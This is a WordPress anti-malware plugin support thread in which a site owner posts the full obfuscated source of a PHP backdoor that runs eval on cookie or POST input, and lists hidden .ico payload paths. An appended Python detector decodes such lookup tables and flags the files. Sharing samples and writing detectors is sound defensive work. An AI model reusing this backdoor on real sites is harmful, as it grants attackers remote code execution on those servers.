Scan potential threats


This topic contains 3 replies, has 2 voices, and was last updated by Steven Baron 1 year, 12 months ago.

Viewing 4 posts - 1 through 4 (of 4 total)
    #2167

    Steven Baron
    Member

    I have been fighting a continual hack on a bunch of my WP sites. Then I came across your plugin and am giving it a shot to see how it works. So far pretty impressed…

    The majority of the attack seems to be .ICO and .PHP files. The .ICO are easy, as all I do is a file scan and delete them. The .PHP seem to be arbitrary names. Your scanner picked a bunch up as potential. For example…

    wp-admin\pv3f8ux4.php contains:

    <?php

    $fqpee = '4-dcb\'2ypu1tlk763#nmoxav58*seH_0f9igr';$nueyq = Array();$nueyq[] = $fqpee[29].$fqpee[26];$nueyq[] = $fqpee[17];$nueyq[] = $fqpee[10].$fqpee[0].$fqpee[33].$fqpee[0].$fqpee[14].$fqpee[14].$fqpee[10].$fqpee[10].$fqpee[1].$fqpee[31].$fqpee[22].$fqpee[31].$fqpee[14].$fqpee[1].$fqpee[0].$fqpee[24].$fqpee[10].$fqpee[22].$fqpee[1].$fqpee[4].$fqpee[10].$fqpee[4].$fqpee[0].$fqpee[1].$fqpee[15].$fqpee[25].$fqpee[31].$fqpee[16].$fqpee[32].$fqpee[28].$fqpee[14].$fqpee[6].$fqpee[22].$fqpee[32].$fqpee[4].$fqpee[28];$nueyq[] = $fqpee[3].$fqpee[20].$fqpee[9].$fqpee[18].$fqpee[11];$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[30].$fqpee[36].$fqpee[28].$fqpee[8].$fqpee[28].$fqpee[22].$fqpee[11];$nueyq[] = $fqpee[28].$fqpee[21].$fqpee[8].$fqpee[12].$fqpee[20].$fqpee[2].$fqpee[28];$nueyq[] = $fqpee[27].$fqpee[9].$fqpee[4].$fqpee[27].$fqpee[11].$fqpee[36];$nueyq[] = $fqpee[22].$fqpee[36].$fqpee[36].$fqpee[22].$fqpee[7].$fqpee[30].$fqpee[19].$fqpee[28].$fqpee[36].$fqpee[35].$fqpee[28];$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[12].$fqpee[28].$fqpee[18];$nueyq[] = $fqpee[8].$fqpee[22].$fqpee[3].$fqpee[13];foreach ($nueyq[7]($_COOKIE, $_POST) as $jsipkrj => $gnufbpt){function xbhdvq($nueyq, $jsipkrj, $swvqcr){return $nueyq[6]($nueyq[4]($jsipkrj . $nueyq[2], ($swvqcr / $nueyq[8]($jsipkrj)) + 1), 0, $swvqcr);}function iopoq($nueyq, $bartqre){return @$nueyq[9]($nueyq[0], $bartqre);}function cwrxi($nueyq, $bartqre){$ynhwgv = $nueyq[3]($bartqre) % 3;if (!$ynhwgv) {eval($bartqre[1]($bartqre[2]));exit();}}$gnufbpt = iopoq($nueyq, $gnufbpt);cwrxi($nueyq, $nueyq[5]($nueyq[1], $gnufbpt ^ xbhdvq($nueyq, $jsipkrj, $nueyq[8]($gnufbpt))));}

    Is there any way that if I submit files and code you can add them to the threat list? Or is this just one of those things that will require manual intervention each time? Other suggestions?

    While I can easily navigate to the location it would be nice if the potential threat section had a check box to allow selection and deletion of files.

    #2168

    Anti-Malware Admin
    Key Master

    Thanks for sending me this code sample. This is another variant of a wide-spread threat that has popped up recently. I have updated the definition with this new variant so my plugin should now be able to find and fix this one too. Please download the latest definition update and let me know if there’s anything else.

    #2169

    Steven Baron
    Member

    There are literally dozens of these randomly named files that are scattered throughout the sites. The code in each one is very different but seems to use the same base for encryption. With that, it seems that .ICO files are a part of the attack. I would recommend removing it from the skip files with the following extensions. Do you want me to send you more code samples for comparison?

    Also, in addition to the manual removal request ability on the potential threat location, maybe you should have a submit for evaluation as an option next to the “white list” when you click on the file. This would save a lot of time reporting and get the attack code in your hands quicker. If you think it might be misused then maybe activate that option for users that have donated, as it will validate the user and allow a little tighter control.

    #2170

    Steven Baron
    Member

    Here is an example of 2 .ICO files from different sites that were found once I removed it from the skip files and were caught by the scanner…

    wp-includes/js/thickbox/.bcb5a93b.ico
    wp-content/plugins/skimlinks/.f397826e.ico
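A defender-side check for the two artefacts this thread describes (hidden .ico dotfiles with hex names, and PHP that assembles its function names from string indices before running eval on request input), as an added Python example that is not the plugin's code nor anything posted in the thread; the regexes, the SUSPECT_NAMES list and the shortened SAMPLE_PHP excerpt are my own constructions.

```python
import re
from pathlib import Path

# Constructed excerpt of the posted sample: the lookup table plus the
# foreach/eval tail, shortened to three table entries for the demo.
SAMPLE_PHP = ("<?php $fqpee = '4-dcb\\'2ypu1tlk763#nmoxav58*seH_0f9igr';"
              "$nueyq = Array();$nueyq[] = $fqpee[29].$fqpee[26];"
              "$nueyq[] = $fqpee[3].$fqpee[20].$fqpee[9].$fqpee[18].$fqpee[11];"
              "$nueyq[] = $fqpee[22].$fqpee[36].$fqpee[36].$fqpee[22].$fqpee[7]"
              ".$fqpee[30].$fqpee[19].$fqpee[28].$fqpee[36].$fqpee[35].$fqpee[28];"
              "foreach ($nueyq[2]($_COOKIE, $_POST) as $k => $v){eval($v);}")

ALPHABET_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")  # $x = '...';
INDEX_CHAIN_RE = re.compile(r"\$(\w+)\[\]\s*=\s*((?:\$\w+\[\d+\]\s*\.?\s*)+);")
REQUEST_INPUT_RE = re.compile(r"\$_(COOKIE|POST|GET|REQUEST)\b")
EVAL_RE = re.compile(r"\beval\s*\(")
HIDDEN_ICO_RE = re.compile(r"^\.[0-9a-f]{8}\.ico$")
# PHP functions that index-built backdoors of this family typically assemble.
SUSPECT_NAMES = {"pack", "array_merge", "str_repeat", "explode", "substr",
                 "strlen", "count", "base64_decode", "gzinflate", "eval"}

def php_unescape(s):
    return s.replace("\\'", "'").replace("\\\\", "\\")

def resolve_lookup_strings(src):
    """Rebuild every string a file assembles as $t[] = $s[i].$s[j]... ."""
    alphabets = {m.group(1): php_unescape(m.group(2)) for m in ALPHABET_RE.finditer(src)}
    out = []
    for m in INDEX_CHAIN_RE.finditer(src):
        chars = []
        for name, idx in re.findall(r"\$(\w+)\[(\d+)\]", m.group(2)):
            alpha = alphabets.get(name)
            if alpha is None or int(idx) >= len(alpha):
                break                      # refers to a constant we cannot see
            chars.append(alpha[int(idx)])
        else:
            out.append("".join(chars))
    return out

def classify_php(src):
    names = resolve_lookup_strings(src)
    suspect = [n for n in names if n in SUSPECT_NAMES]
    eval_on_input = bool(EVAL_RE.search(src) and REQUEST_INPUT_RE.search(src))
    return {"resolved": names, "suspect": suspect, "eval_on_input": eval_on_input,
            "malicious": eval_on_input and len(suspect) >= 2}

def is_hidden_ico(path):
    """Dotfile .ico with an 8-hex-digit name, like the two paths in the post."""
    return bool(HIDDEN_ICO_RE.match(Path(path).name))

def scan_tree(root):
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and is_hidden_ico(p):
            findings.append((str(p), "hidden-ico"))
        elif p.is_file() and p.suffix == ".php" and classify_php(p.read_text(errors="replace"))["malicious"]:
            findings.append((str(p), "index-lookup-backdoor"))
    return findings
```

Run `scan_tree("/path/to/wordpress")` to list hits; the resolved names (here "H*", "count", "array_merge") are what the scrambled table actually calls, which is the quickest way to confirm a flagged file is a backdoor rather than a false positive.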
